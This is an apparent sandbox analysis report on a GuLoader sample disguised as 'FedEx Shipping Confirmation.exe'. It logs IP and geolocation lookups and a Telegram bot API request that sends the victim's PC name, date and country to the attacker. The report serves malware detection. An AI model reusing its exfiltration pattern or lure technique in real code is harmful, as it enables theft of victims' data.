Aug 27, 2024 18:04:59.069802046 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 27, 2024 18:04:59.257766962 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:59 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a5de101f6285eb3ef7451e625184c2ae Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49797	104.21.67.152	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:04:53 UTC	86	OUT	GET /xml/102.165.48.74 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-27 16:04:54 UTC	691	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:54 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Tue, 27 Aug 2024 16:04:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5fdWxbMfRedlDJ9i2OZC2FXAQm5G31SZsc%2FNDYtuZLcks5mFhjN0plZbmDCgqzaA4VKgKEgaEV9LiUHR3FMhLERy1Sq90KCZl1IK79da9C0Gacpi4x1MJ2T0e5qwfCnScg3PaDK7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9d4ccd285c37ff-IAD alt-svc: h3=":443"; ma=86400
2024-08-27 16:04:54 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>102.165.48.74</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
2024-08-27 16:04:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49798	104.21.67.152	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:04:54 UTC	62	OUT	GET /xml/102.165.48.74 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-27 16:04:55 UTC	706	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:54 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 0 Last-Modified: Tue, 27 Aug 2024 16:04:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2Bn7vmeJkgJfPx9SLOpMgIPpeQhGHMMKMHvn1jPS1K6G%2FjZrJKHA8jeQHnLbWUs8L66i38FrZbboCUdUFCvebOGHhElaY%2BQ8%2FdhIxa2wdW8ruU%2Bi39wUGtiBSH3aLwp7uPCf2JSj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9d4cd35acec968-IAD alt-svc: h3=":443"; ma=86400
2024-08-27 16:04:55 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>102.165.48.74</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
2024-08-27 16:04:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49799	104.21.67.152	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:04:55 UTC	62	OUT	GET /xml/102.165.48.74 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-27 16:04:55 UTC	698	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:55 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Tue, 27 Aug 2024 16:04:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCIKi1zqZasIpEv3tPRd2RPF00pJS0f91dnESnCjSExd7ft773Ljk1%2FoqNv5nG2q2Gi3YLQ4GcgvVlwWskLpZSCtDZcBn4SK01d4YraCkW1FsgJBjTm41O1IkW0zobONVIOKQyFi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9d4cd79abcc9a9-IAD alt-svc: h3=":443"; ma=86400
2024-08-27 16:04:55 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>102.165.48.74</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
2024-08-27 16:04:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49800	104.21.67.152	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:04:56 UTC	62	OUT	GET /xml/102.165.48.74 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-27 16:04:56 UTC	700	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2 Last-Modified: Tue, 27 Aug 2024 16:04:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IzbDaNDUdYG4ZXYAjIHOWprgvTt6ezQt1CcBmmmAd106ZT2F5upOYTTDK3PDbgDp6Ze9jnvTkWTQ1KBF1L%2F0zpEE91fd6xvvJpn5UzbOgLa%2BHR3qqTG0Dm191qkZbWWwn950Iwml"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9d4cdbc986c993-IAD alt-svc: h3=":443"; ma=86400
2024-08-27 16:04:56 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>102.165.48.74</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
2024-08-27 16:04:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49801	104.21.67.152	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:04:56 UTC	62	OUT	GET /xml/102.165.48.74 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-27 16:04:57 UTC	706	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2 Last-Modified: Tue, 27 Aug 2024 16:04:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbWG9dCEBvuK3OW1VNrOgk%2F4tgRBZUFrdyS6G75gLPjZ0NXj9IfJAWGo863QN6d%2FFvsBT4PN3CCa84wlZ3ga5R09bFqRviOnUlq%2BbO%2FP6TYYpvStqNDy807vXhN5RdK1H2NWs%2Fu9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9d4cdfef8d1ffe-IAD alt-svc: h3=":443"; ma=86400
2024-08-27 16:04:57 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>102.165.48.74</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
2024-08-27 16:04:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49802	104.21.67.152	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:04:57 UTC	62	OUT	GET /xml/102.165.48.74 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-27 16:04:57 UTC	710	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:57 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 3 Last-Modified: Tue, 27 Aug 2024 16:04:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVcV%2FDSBpy34tbo%2FwE47fH5YFeUuJbvdxpkpGW%2Bu3Sx%2BrvFxg0OgYoOkdjU6uysXumJ7Ts0eK%2Fv%2BsPkrUolTAYNFOZWF9S9UPaCjdznhHKcqkBdSrcykVp%2FBmnu7GYcHrMoG4oB4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9d4ce43885c974-IAD alt-svc: h3=":443"; ma=86400
2024-08-27 16:04:57 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>102.165.48.74</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
2024-08-27 16:04:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49803	104.21.67.152	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:04:58 UTC	62	OUT	GET /xml/102.165.48.74 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-27 16:04:58 UTC	704	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:58 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4 Last-Modified: Tue, 27 Aug 2024 16:04:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0yINvUE8VIHQI0GdMLS6fK6aWfo%2FDrWrKXl617X1yn5ocsJ2NOyJjtwi71sxTlydkP4tiOD5502l3Frt93SCqXUxMekHkQMQ9fbMxtl6n9gJhth6QUEUAn%2FjCUr335C5%2Fer%2Bpjc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9d4ce87ce0c96a-IAD alt-svc: h3=":443"; ma=86400
2024-08-27 16:04:58 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>102.165.48.74</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
2024-08-27 16:04:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49804	104.21.67.152	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:04:58 UTC	62	OUT	GET /xml/102.165.48.74 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-27 16:04:59 UTC	702	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:59 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Tue, 27 Aug 2024 16:04:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yM6s1lyh2SeSLBabaQNzIm9CYhZzmwiqNgnfV4xAbTtnfBm8FMy92M%2FYOnlJynOQsowzAStPyBbg3Ldm%2BblxVpd0knxTbW5L8GEuJHvEDuuGOjcPYNBdyHz7aSH%2BBwKYISVyRDmy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9d4cecab4e2423-IAD alt-svc: h3=":443"; ma=86400
2024-08-27 16:04:59 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>102.165.48.74</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
2024-08-27 16:04:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49805	104.21.67.152	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:04:59 UTC	62	OUT	GET /xml/102.165.48.74 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-27 16:04:59 UTC	706	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:59 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Tue, 27 Aug 2024 16:04:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oySsrpPQa7m9PlbG%2FdxmbOseCMd2a9JMI0siYSLg1%2FP3l5GcRaheiVXOrfP72f%2BGKpUTE9kWvUB7ZrsRbkVA4MmgdyKGCQiWrVTdi9QDygL%2Ba9z9I6AFoiZt5%2Ffp4v2yzquWE7HE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9d4cf0fd3381b1-IAD alt-svc: h3=":443"; ma=86400
2024-08-27 16:04:59 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>102.165.48.74</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
2024-08-27 16:04:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49806	149.154.167.220	443	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-27 16:05:00 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2027/08/2024%20/%2012:04:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-08-27 16:05:00 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 27 Aug 2024 16:05:00 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-27 16:05:00 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	1
Start time:	12:04:20
Start date:	27/08/2024
Path:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"
Imagebase:	0x400000
File size:	749'680 bytes
MD5 hash:	F48AD078B3B7BEC3EF37E33619DBE943
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.3333461569.0000000004B3F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:04:44
Start date:	27/08/2024
Path:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"
Imagebase:	0x400000
File size:	749'680 bytes
MD5 hash:	F48AD078B3B7BEC3EF37E33619DBE943
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
